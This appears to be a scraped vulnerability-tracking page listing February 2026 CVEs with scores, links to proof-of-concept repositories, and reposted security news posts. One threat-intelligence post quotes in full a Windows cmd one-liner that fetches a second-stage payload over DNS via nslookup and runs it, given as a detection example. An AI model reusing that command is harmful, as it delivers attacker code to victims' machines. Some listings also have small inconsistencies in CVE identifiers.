https://github.com/andreassudo/CVE-2026-21510-CVSS-8.8-Important-Windows-Shell-security-feature-bypass

linux@activitypub.awakari.com at 2026-02-10T18:55:45.000Z ## Microsoft’s February 2026 Patch Tuesday Addresses 54 CVEs (CVE-2026-21510, CVE-2026-21513) 2 Critical 51 Important 1 Moderate 0 Low Microsoft addresses 54 CVEs in the February 2026 Patch Tuesday ...


Origin | Interest | Match ##

CVE-2026-21513
(8.8 HIGH)

EPSS: 4.12%

updated 2026-02-10T21:31:29

1 posts

Protection mechanism failure in MSHTML Framework allows an unauthorized attacker to bypass a security feature over a network.

linux@activitypub.awakari.com at 2026-02-10T18:55:45.000Z ## Microsoft’s February 2026 Patch Tuesday Addresses 54 CVEs (CVE-2026-21510, CVE-2026-21513) 2 Critical 51 Important 1 Moderate 0 Low Microsoft addresses 54 CVEs in the February 2026 Patch Tuesday ...


Origin | Interest | Match ##

CVE-2025-14831
(5.3 MEDIUM)

EPSS: 0.04%

updated 2026-02-09T16:08:35.290000

1 posts

A flaw was found in GnuTLS. This vulnerability allows a denial of service (DoS) by excessive CPU (Central Processing Unit) and memory consumption via specially crafted malicious certificates containing a large number of name constraints and subject alternative names (SANs).

linux@activitypub.awakari.com at 2026-02-18T12:00:11.000Z ## Debian gnutls28 Important Denial of Service Fix DSA-6140-1 CVE-2025-14831 Tim Scheckenbach reported a flaw in GnuTLS, a library implementing the TLS and SSL protocols. Processing of specially craft...

#Debian #Linux #Distribution #- #Security #Advisories

Origin | Interest | Match ##

CVE-2026-22903
(9.8 CRITICAL)

EPSS: 0.57%

updated 2026-02-09T09:30:28

1 posts

An unauthenticated remote attacker can send a crafted HTTP request containing an overly long SESSIONID cookie. This can trigger a stack buffer overflow in the modified lighttpd server, causing it to crash and potentially enabling remote code execution due to missing stack protections.

Matchbook3469@mastodon.social at 2026-02-17T13:44:40.000Z ##

🚨 New security advisory:

CVE-2026-22903 affects multiple systems.

• Impact: Remote code execution or complete system compromise possible
• Risk: Attackers can gain full control of affected systems
• Mitigation: Patch immediately or isolate affected systems

Full breakdown:
advisory.yazoul.net/cve/cve-20

#Cybersecurity #VulnerabilityManagement #CyberSec

##

CVE-2026-24423
(9.8 CRITICAL)

EPSS: 22.65%

updated 2026-02-06T16:45:15.323000

1 posts

SmarterTools SmarterMail versions prior to build 9511 contain an unauthenticated remote code execution vulnerability in the ConnectToHub API method. The attacker could point the SmarterMail to the malicious HTTP server, which serves the malicious OS command. This command will be executed by the vulnerable application.

1 repos

https://github.com/aavamin/CVE-2026-24423

undercodenews@mastodon.social at 2026-02-18T20:01:18.000Z ##

Alarming Surge in SmarterMail Exploits Threatens Email Servers Worldwide

Cybersecurity experts are raising the alarm as critical vulnerabilities in SmarterMail—specifically CVE-2026-24423 and CVE-2026-23760—are being rapidly weaponized. Exploit proof-of-concepts (PoCs), stolen administrator credentials, and even ransomware deployment instructions are circulating openly on Telegram channels. Organizations relying on these email servers face an urgent need to patch their…

undercodenews.com/alarming-sur

##

CVE-2026-1340
(9.8 CRITICAL)

EPSS: 29.29%

updated 2026-02-04T16:34:21.763000

4 posts

A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve unauthenticated remote code execution.

1 repos

https://github.com/MehdiLeDeaut/CVE-2026-1281-Ivanti-EPMM-RCE

CVE-2021-39935
(6.8 MEDIUM)

EPSS: 57.16%

updated 2026-02-04T15:56:15.730000

2 posts

An issue has been discovered in GitLab CE/EE affecting all versions starting from 10.5 before 14.3.6, all versions starting from 14.4 before 14.4.4, all versions starting from 14.5 before 14.5.2. Unauthorized external users could perform Server Side Requests via the CI Lint API

darses@mastodon.nl at 2026-02-18T19:35:54.000Z ##

Gitlab vulnerability CVE-2021-22175 got added to the CISA KEV. But this vuln is just a more complete patch to CVE-2021-22214. Likewise CVE-2021-39935 covers even more case where the CI Lint function could be used without authentication. In fact, the exploit code identical for all vulnerabilites. CVE-2021-39935 was already on the list, CVE-2021-22175 got added today and CVE-2021-22214 is still missing.

#cybersecurity #vulnerability #circus

##

darses@mastodon.nl at 2026-02-18T19:35:54.000Z ##

Gitlab vulnerability CVE-2021-22175 got added to the CISA KEV. But this vuln is just a more complete patch to CVE-2021-22214. Likewise CVE-2021-39935 covers even more case where the CI Lint function could be used without authentication. In fact, the exploit code identical for all vulnerabilites. CVE-2021-39935 was already on the list, CVE-2021-22175 got added today and CVE-2021-22214 is still missing.

#cybersecurity #vulnerability #circus

##

CVE-2025-15467
(9.8 CRITICAL)

EPSS: 0.92%

updated 2026-02-02T18:38:55.073000

2 posts

Issue summary: Parsing CMS AuthEnvelopedData message with maliciously crafted AEAD parameters can trigger a stack buffer overflow. Impact summary: A stack buffer overflow may lead to a crash, causing Denial of Service, or potentially remote code execution. When parsing CMS AuthEnvelopedData structures that use AEAD ciphers such as AES-GCM, the IV (Initialization Vector) encoded in the ASN.1 para

4 repos

https://github.com/guiimoraes/CVE-2025-15467

https://github.com/balgan/CVE-2025-15467

https://github.com/MAXI8594/CVE-2025-15467_Scan

https://github.com/mr-r3b00t/CVE-2025-15467

itgrrl at 2026-02-19T02:18:32.104Z ##

this looks like a genuinely good and very impressive use of “AI” in security research – I’m leaving the air quotes in place at the moment since I haven’t been able to find much detail on how the system actually operates. describes it as an “autonomous analyser” and “the world’s first -native Cyber Reasoning System (CRS) for vulnerability management” 🙄

I’m pretty sure it’s not just spicy autocarrot though, possibly a mix of deep learning or other machine learning techniques (things that I think of as part of “traditional” AI research) with a sprinkling of LLM on top for “natural language” capabilities (and it’s possible that they’re leaning into “AI” as a descriptor to assign to the current hype cycle rather than calling it “machine learning” but ¯_(ツ)_/¯ )

What AI Security Research Looks Like When It Works

“In the latest security release on January 27, 2026, twelve new zero-day vulnerabilities (meaning unknown to the maintainers at time of disclosure) were announced. Our AI system is responsible for the original discovery of all twelve, each found and responsibly disclosed to the OpenSSL team during the fall and winter of 2025. Of those, 10 were assigned -2025 identifiers and 2 received CVE-2026 identifiers. Adding the 10 to the three we already found in the Fall 2025 release, AISLE is credited for surfacing 13 of 14 OpenSSL assigned in 2025, and 15 total across both releases. This is a historically unusual concentration for any single research team, let alone an AI-driven one.

These weren't trivial findings either. They included CVE-2025-15467, a stack buffer overflow in CMS message parsing that's potentially remotely exploitable without valid key material, and exploits for which have been quickly developed online. OpenSSL rated it HIGH severity; NIST's CVSS v3 score is 9.8 out of 10 (CRITICAL, an extremely rare severity rating for such projects). Three of the bugs had been present since 1998-2000, for over a quarter century having been missed by intense machine and human effort alike. One predated OpenSSL itself, inherited from 's original implementation in the 1990s. All of this in a codebase that has been fuzzed for millions of CPU-hours and audited extensively for over two decades by teams including Google's.

In five of the twelve cases, our AI system directly proposed the patches that were accepted into the official release.”

aisle.com/blog/what-ai-securit

##

itgrrl@infosec.exchange at 2026-02-19T02:18:32.000Z ##

this looks like a genuinely good and very impressive use of “AI” in security research – I’m leaving the air quotes in place at the moment since I haven’t been able to find much detail on how the system actually operates. #AISLE describes it as an “autonomous analyser” and “the world’s first #AI-native Cyber Reasoning System (CRS) for vulnerability management” 🙄

I’m pretty sure it’s not just spicy autocarrot though, possibly a mix of deep learning or other machine learning techniques (things that I think of as part of “traditional” AI research) with a sprinkling of LLM on top for “natural language” capabilities (and it’s possible that they’re leaning into “AI” as a descriptor to assign to the current hype cycle rather than calling it “machine learning” but ¯_(ツ)_/¯ )

What AI Security Research Looks Like When It Works

“In the latest #OpenSSL security release on January 27, 2026, twelve new zero-day vulnerabilities (meaning unknown to the maintainers at time of disclosure) were announced. Our AI system is responsible for the original discovery of all twelve, each found and responsibly disclosed to the OpenSSL team during the fall and winter of 2025. Of those, 10 were assigned #CVE-2025 identifiers and 2 received CVE-2026 identifiers. Adding the 10 to the three we already found in the Fall 2025 release, AISLE is credited for surfacing 13 of 14 OpenSSL #CVEs assigned in 2025, and 15 total across both releases. This is a historically unusual concentration for any single research team, let alone an AI-driven one.

These weren't trivial findings either. They included CVE-2025-15467, a stack buffer overflow in CMS message parsing that's potentially remotely exploitable without valid key material, and exploits for which have been quickly developed online. OpenSSL rated it HIGH severity; NIST's CVSS v3 score is 9.8 out of 10 (CRITICAL, an extremely rare severity rating for such projects). Three of the bugs had been present since 1998-2000, for over a quarter century having been missed by intense machine and human effort alike. One predated OpenSSL itself, inherited from #EricYoung's original #SSLeay implementation in the 1990s. All of this in a codebase that has been fuzzed for millions of CPU-hours and audited extensively for over two decades by teams including Google's.

In five of the twelve cases, our AI system directly proposed the patches that were accepted into the official release.”

aisle.com/blog/what-ai-securit

##

CVE-2026-1281
(9.8 CRITICAL)

EPSS: 39.20%

updated 2026-01-30T00:31:29

7 posts

A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve unauthenticated remote code execution.

1 repos

https://github.com/MehdiLeDeaut/CVE-2026-1281-Ivanti-EPMM-RCE

darses@mastodon.nl at 2026-02-18T17:53:38.000Z ##

The German BSI on the recently patched Ivanti Endpoint Manager Mobile (EPMM) vulnerability CVE-2026-1281: "the BSI has evidence that a exploitation of the vulnerability may have taken place at least since summer 2025." (Translated)

Kudo's to them for making this public.

#cybersecurity #vulnerability #CVE-2026-1281

##

AAKL at 2026-02-18T17:40:32.049Z ##

This was posted yesterday.

Unit 42: Critical Vulnerabilities in Ivanti EPMM Exploited unit42.paloaltonetworks.com/iv @unit42_intel

##

pentesttools at 2026-02-18T12:37:06.302Z ##

🚨 Active exploitation confirmed for a new unauthenticated RCE in Ivanti - CVE-2026-1281

With a CVSS of 9.8 and part of CISA KEV, attackers need *zero* credentials to use this CVE and exploit legacy bash scripts and gain root access.

So we updated Pentest-Tools.com to help you confirm the risk:

📡 Network Scanner - detects exposed Ivanti EPMM instances on your perimeter.

🎯 Sniper Auto-Exploiter - safely demonstrates the RCE to prove the risk is real (and urgent).

Find more info for your rapid response flows here: pentest-tools.com/vulnerabilit

##

hackerworkspace at 2026-02-18T06:10:40.977Z ##

Critical Vulnerabilities in Ivanti EPMM Exploited

unit42.paloaltonetworks.com/iv

##

AAKL@infosec.exchange at 2026-02-18T17:40:32.000Z ##

This was posted yesterday.

Unit 42: Critical Vulnerabilities in Ivanti EPMM Exploited unit42.paloaltonetworks.com/iv @unit42_intel #infosec #Ivanti #vulnerability

##

pentesttools@infosec.exchange at 2026-02-18T12:37:06.000Z ##

🚨 Active exploitation confirmed for a new unauthenticated RCE in Ivanti - CVE-2026-1281

With a CVSS of 9.8 and part of CISA KEV, attackers need *zero* credentials to use this CVE and exploit legacy bash scripts and gain root access.

So we updated Pentest-Tools.com to help you confirm the risk:

📡 Network Scanner - detects exposed Ivanti EPMM instances on your perimeter.

🎯 Sniper Auto-Exploiter - safely demonstrates the RCE to prove the risk is real (and urgent).

Find more info for your rapid response flows here: pentest-tools.com/vulnerabilit

#offensivesecurity #ethicalhacking #infosec #cybersecurity #vulnerabilitymanagement

##

hackerworkspace@infosec.exchange at 2026-02-18T06:10:40.000Z ##

Critical Vulnerabilities in Ivanti EPMM Exploited

unit42.paloaltonetworks.com/iv

#cybersecurity #vulnerability #exploit

##

CVE-2026-23760
(9.8 CRITICAL)

EPSS: 55.75%

updated 2026-01-27T18:33:14

1 posts

SmarterTools SmarterMail versions prior to build 9511 contain an authentication bypass vulnerability in the password reset API. The force-reset-password endpoint permits anonymous requests and fails to verify the existing password or a reset token when resetting system administrator accounts. An unauthenticated attacker can supply a target administrator username and a new password to reset the acc

Nuclei template

2 repos

https://github.com/hilwa24/CVE-2026-23760_SmarterMail-Auth-Bypass-and-RCE

https://github.com/MaxMnMl/smartermail-CVE-2026-23760-poc

undercodenews@mastodon.social at 2026-02-18T20:01:18.000Z ##

Alarming Surge in SmarterMail Exploits Threatens Email Servers Worldwide

Cybersecurity experts are raising the alarm as critical vulnerabilities in SmarterMail—specifically CVE-2026-24423 and CVE-2026-23760—are being rapidly weaponized. Exploit proof-of-concepts (PoCs), stolen administrator credentials, and even ransomware deployment instructions are circulating openly on Telegram channels. Organizations relying on these email servers face an urgent need to patch their…

undercodenews.com/alarming-sur

##

CVE-2025-64155
(9.8 CRITICAL)

EPSS: 0.04%

updated 2026-01-20T16:16:06.200000

2 posts

An improper neutralization of special elements used in an os command ('os command injection') vulnerability in Fortinet FortiSIEM 7.4.0, FortiSIEM 7.3.0 through 7.3.4, FortiSIEM 7.1.0 through 7.1.8, FortiSIEM 7.0.0 through 7.0.4, FortiSIEM 6.7.0 through 6.7.10 may allow an attacker to execute unauthorized code or commands via crafted TCP requests.

4 repos

https://github.com/cyberdudebivash/CYBERDUDEBIVASH-FortiSIEM-CVE-2025-64155-Scanner

https://github.com/Mefhika120/Ashwesker-CVE-2025-64155

https://github.com/purehate/CVE-2025-64155-hunter

https://github.com/horizon3ai/CVE-2025-64155

CVE-2026-20965
(7.6 HIGH)

EPSS: 0.03%

updated 2026-01-13T18:31:18

2 posts

Improper verification of cryptographic signature in Windows Admin Center allows an authorized attacker to elevate privileges locally.

_r_netsec at 2026-02-17T14:43:09.069Z ##

CVE-2026-20965: Cymulate Research Labs Discovers Token Validation Flaw that Leads to Tenant-Wide RCE in Azure Windows Admin Center cymulate.com/blog/cve-2026-209

##

_r_netsec@infosec.exchange at 2026-02-17T14:43:09.000Z ##

CVE-2026-20965: Cymulate Research Labs Discovers Token Validation Flaw that Leads to Tenant-Wide RCE in Azure Windows Admin Center cymulate.com/blog/cve-2026-209

##

CVE-2025-59922
(7.2 HIGH)

EPSS: 0.05%

updated 2026-01-13T18:31:14

2 posts

An improper neutralization of special elements used in an SQL command ('SQL Injection') vulnerability [CWE-89] vulnerability in Fortinet FortiClientEMS 7.4.3 through 7.4.4, FortiClientEMS 7.4.0 through 7.4.1, FortiClientEMS 7.2.0 through 7.2.10, FortiClientEMS 7.0 all versions may allow an authenticated attacker with at least read-only admin permission to execute unauthorized SQL code or commands

_r_netsec at 2026-02-17T14:43:07.235Z ##

Fortinet Forticlient EMS RCE CVE-2025-59922 and one IMG tag to rule them all baldur.dk/blog/fortinet-ems-rc

##

_r_netsec@infosec.exchange at 2026-02-17T14:43:07.000Z ##

Fortinet Forticlient EMS RCE CVE-2025-59922 and one IMG tag to rule them all baldur.dk/blog/fortinet-ems-rc

##

CVE-2025-6264
(4.7 MEDIUM)

EPSS: 0.07%

updated 2025-10-13T15:45:56

1 posts

Velociraptor allows collection of VQL queries packaged into Artifacts from endpoints. These artifacts can be used to do anything and usually run with elevated permissions.  To limit access to some dangerous artifact, Velociraptor allows for those to require high permissions like EXECVE to launch. The Admin.Client.UpdateClientConfig is an artifact used to update the client's configuration. This ar

1 repos

https://github.com/Al-Lord0x/CVE-2025-62641

TrustedAlpaca@infosec.exchange at 2026-02-17T08:13:19.000Z ##

cmd /c "nslookup example.com 192.168.1[.]1 | findstr "^Name:" | for /f "tokens=1,* delims=:" %a in ('more') do @echo %b" | cmd && exit\1

To an untrained eye, the above command might not look suspicious, as it uses a legitimate Windows tool called nslookup, but in reality the command is part of a staged infection as it delivers a second-stage payload via DNS that is controlled by the attacker.

Just because a legitimate executable runs commands doesn't mean that the binary itself or its parameters can't be abused to deliver or execute something malicious. The same goes for Velociraptor version 0.73.4.0, which contains a privilege escalation vulnerability under CVE-2025-6264. It is a legitimate DFIR tool, but because of its vulnerability, ransomware gangs use it to elevate privileges and execute malicious commands with higher privileges.

When detecting malicious activity, context and the commands executed are very important, because one technique used by threat actors to stay undetected as long as possible is abusing legitimate tools or built-in Windows executables to draw less attention to their malicious activities. To an untrained eye, such commands can look legitimate because the executables are reputable, they may be attributed as false positives or fly under the radar if detection engineering is not mature enough.

#Malware #ThreatIntel #ThreatIntelligence #ClickFix #SOC #DFIR #Microsoft

##

CVE-2021-22214(CVSS UNKNOWN)

EPSS: 93.52%

updated 2023-01-29T05:06:54

2 posts

When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab CE/EE affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker even on a GitLab instance where registration is limited

Nuclei template

4 repos

https://github.com/kh4sh3i/GitLab-SSRF-CVE-2021-22214

https://github.com/aaminin/CVE-2021-22214

https://github.com/Vulnmachines/gitlab-cve-2021-22214

https://github.com/ZZ-SOCMAP/CVE-2021-22214

darses@mastodon.nl at 2026-02-18T19:35:54.000Z ##

Gitlab vulnerability CVE-2021-22175 got added to the CISA KEV. But this vuln is just a more complete patch to CVE-2021-22214. Likewise CVE-2021-39935 covers even more case where the CI Lint function could be used without authentication. In fact, the exploit code identical for all vulnerabilites. CVE-2021-39935 was already on the list, CVE-2021-22175 got added today and CVE-2021-22214 is still missing.

#cybersecurity #vulnerability #circus

##

darses@mastodon.nl at 2026-02-18T19:35:54.000Z ##

Gitlab vulnerability CVE-2021-22175 got added to the CISA KEV. But this vuln is just a more complete patch to CVE-2021-22214. Likewise CVE-2021-39935 covers even more case where the CI Lint function could be used without authentication. In fact, the exploit code identical for all vulnerabilites. CVE-2021-39935 was already on the list, CVE-2021-22175 got added today and CVE-2021-22214 is still missing.

#cybersecurity #vulnerability #circus

##

CVE-2025-41725
(0 None)

EPSS: 0.00%

2 posts

N/A

certvde at 2026-02-18T14:42:45.874Z ##

VDE-2026-0001
JBL: DoS vulnerability in Flip 4

Any attacker in radio range can send malicious messages to cause the device to crash.
CVE-2025-41725

certvde.com/en/advisories/vde-

harman.csaf-tp.certvde.com/.we

##

certvde@infosec.exchange at 2026-02-18T14:42:45.000Z ##

#OT #Advisory VDE-2026-0001
JBL: DoS vulnerability in Flip 4

Any attacker in radio range can send malicious messages to cause the device to crash.
#CVE CVE-2025-41725

certvde.com/en/advisories/vde-

#CSAF harman.csaf-tp.certvde.com/.we #oCSAF

##

CVE-2026-2239
(0 None)

EPSS: 0.00%

1 posts

N/A

linux@activitypub.awakari.com at 2026-02-18T11:07:18.000Z ## Debian GIMP High Denial of Service Risk DSA-6139-1 CVE-2026-2239 Several vulnerabilities were discovered in GIMP, the GNU Image Manipulation Program, which could result in denial of service or pote...

#Debian #Linux #Distribution #- #Security #Advisories

Origin | Interest | Match ##

CVE-2026-02447
(0 None)

EPSS: 0.00%

1 posts

N/A

Mozilla@activitypub.awakari.com at 2026-02-17T05:40:00.000Z ## Firefox 147.0.4: Mozilla исправила пустую страницу новой вкладки и уязвимость в libvpx (CVE-2026-02447) Mozilla Firefox 147.0.4 — четвёртое...

#Технологии

Origin | Interest | Match ##

Visit counter For Websites